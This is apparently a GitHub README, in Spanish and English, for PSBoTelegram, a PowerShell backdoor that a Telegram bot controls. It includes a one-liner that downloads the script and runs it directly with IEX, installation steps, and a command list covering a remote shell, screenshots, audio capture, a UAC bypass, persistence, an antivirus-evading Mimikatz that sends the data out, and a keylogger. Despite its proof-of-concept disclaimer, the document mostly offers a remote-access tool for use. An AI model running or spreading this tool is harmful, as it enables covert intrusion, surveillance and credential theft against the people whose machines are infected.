/PSBoTelegram

Backdoor en powershell vía Telegram

Primary LanguagePowerShell

PsBoTelegram

Backdoor using Telegram and Powershell. Por favor, usad sólo vuestros equipos para las pruebas.
No me hago responsable de un mal uso del software. Rercordad que esto sólo es una prueba de concepto.

Podeis probar el script abriendo una consola de powershell y ejecutando este comando:

IEX (curl "https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/PSBoTelegram.ps1" ).content  

    ____  _____ ____      ______     __
   / __ \/ ___// __ )____/_  __/__  / /__   ____ __________ _____ __
  / /_/ /\__ \/ __  / __ \/ / / _ \/ / _ \/ __  / ___/ __  / __  __ \
 / ____/___/ / /_/ / /_/ / / /  __/ /  __/ /_/ / /  / /_/ / / / / / /
/_/    /____/_____/\____/_/  \___/_/\___/\__, /_/   \__,_/_/ /_/ /_/
                                        /____/

                                                 v0.8 by CyberVaca @ HackPlayers

PSBotTelegram es un script escrito en Powershell, que nos crea una backdoor que se conecta a un BOT de Telegram. El BOT se controlará por mensajes de Telegram. Al ejecutar el script nos va a pedir tres datos necesarios para crear el shellcode.

Instalación en Linux

git clone https://github.com/hackplayers/psbotelegram.git
cd psbotelegram
sudo apt-get update > /dev/null
sudo apt-get install libunwind8 libicu55 
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
powershell ./PSBoTelegram.ps1

Instalación en Windows

Powershell.exe ./PSBotelegram.ps1

Los datos que nos pide son los siguientes:

Parametros

Parametros

[+] Introduzca el Token del Bot de Telegram: "Aquí deberemos poner el Token del bot que hayamos creado."
[+] Introduzca su Chat ID: "Aquí deberemos poner nuestro ID de Telegram."
[+] Introduzca el delay para la conexión: "En este campo seteamos el delay(retardo) entre en pc con el backdoor y nuestro chat de telegram"

Salidas de archivo:

Salidas

Una vez introducido estos datos, nos creará un shellcode en BASE64 en un tipo de archivo seleccionado para ejecutarlo en el equipo a auditar.

Funciones del backdoor.

[1]   /Help   (Nos muestra la ayuda)
[2]   /Info   (Devuelve información sobre el equipo)
[3]   /Shell   (/Shell + CmdLet a ejecutar )
[4]   /Whoami   (Devuelve el usuario que ejecutó el codigo)
[5]   /Ippublic   (Nos da IP publica, Pais y Ciudad del Target)
[6]   /Kill   (Mata el backdoor)
[7]   /Scriptimport   (Importa el script de powershell pasandole una url)
[8]   /Shell nc (netcat)   (Función de powercat https://github.com/besimorhino/powercat )
[9]   /Download   (Download mas ruta nos descarga el archivo)
[10]  /Screenshot   (Realiza screenshot y nos lo envia)
[11]  /Audio   (/Audio X, Grabaría X segundos de audio y nos lo envia)
[12]  /BypassUAC   (Ejecuta el Bot con privilegios administrativos)
[13]  /Persistence   (/Persistence ON/OFF)
[14]  /MimiGatoz   (Ejecuta Mimikatz modificado para el bypass AV y nos envia los datos)
[15]  /Keylogger-Selective   (Ejecuta un Keylogger selectivo, ejemplo /keylogger-Selective Facebook)
[16]  /Mimikittenz   (Ejecuta Mimikittenz, comprobando si el equipo es vulnerable y si no lo es, lo hace vulnerable... )

PsBoTelegram English

Backdoor using Telegram and Powershell. Please use only your test equipment. I am not responsible for any misuse of the software. Make sure this is only a proof of concept.

You can test the script by opening a powershell console and running this command:

IEX (curl "https://raw.githubusercontent.com/Hackplayers/PSBoTelegram/master/PSBoTelegram.ps1" ).content  

    ____  _____ ____      ______     __
   / __ \/ ___// __ )____/_  __/__  / /__   ____ __________ _____ __
  / /_/ /\__ \/ __  / __ \/ / / _ \/ / _ \/ __  / ___/ __  / __  __ \
 / ____/___/ / /_/ / /_/ / / /  __/ /  __/ /_/ / /  / /_/ / / / / / /
/_/    /____/_____/\____/_/  \___/_/\___/\__, /_/   \__,_/_/ /_/ /_/
                                        /____/

                                                 v0.8 by CyberVaca @ HackPlayers

PSBotTelegram is a script written in Powershell, which creates a backdoor that connects to a Telegram BOT. The BOT will be controlled by Telegram messages. When executing the script we will ask for three data needed to create the shellcode.

Install in Linux

git clone https://github.com/hackplayers/psbotelegram.git
cd psbotelegram
sudo apt-get update > /dev/null
sudo apt-get install libunwind8 libicu55 
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
powershell ./PSBoTelegram.ps1

Install in Windows

Powershell.exe ./PSBotelegram.ps1

The data that asks us are the following:

Parametres

Parametros

[+] Enter the Telegram Bot Token: "Here we have to put the Token of the bot we have created."
[+] Enter your Chat ID: "Here we have to put our Telegram ID."
[+] Enter the delay for the connection: "In this field we set the delay between pc in the backdoor and our telegram chat"

Backdoor functions

[1]   /Help (Show us the help)
[2]   /Info (Returns information about the equipment)
[3]   /Shell (/ Shell + CmdLet to run)
[4]   /Whoami (Returns the user who ran the code)
[5]   /Ippublic (We give IP publica, Country and Target City)
[6]   /Kill (Kill the backdoor)
[7]   /Scriptimport (Import the powershell script by passing it a url)
[8]   /Shell nc (netcat) (Powercat function https://github.com/besimorhino/powercat)
[9]   /Download (Download more path to download the file)
[10]   /Screenshot (Make screenshot and send it to us)
[11]   /Audio (/Audio X, Record X seconds of audio and send it to us)
[12]   /BypassUAC (Runs the bot with administrative privileges)
[13]   /Persistence (/ Persistence ON / OFF)
[14]   /MimiGatoz (Run modified Mimikatz for AV bypass and send us the data)
[15]   /Keylogger-Selective (Executes a Selective Keylogger, example /keylogger-Selective Facebook)
[16]   /Mimikittenz (Mimikittenz runs, checking if the computer is vulnerable and if it is not, it makes it vulnerable ...)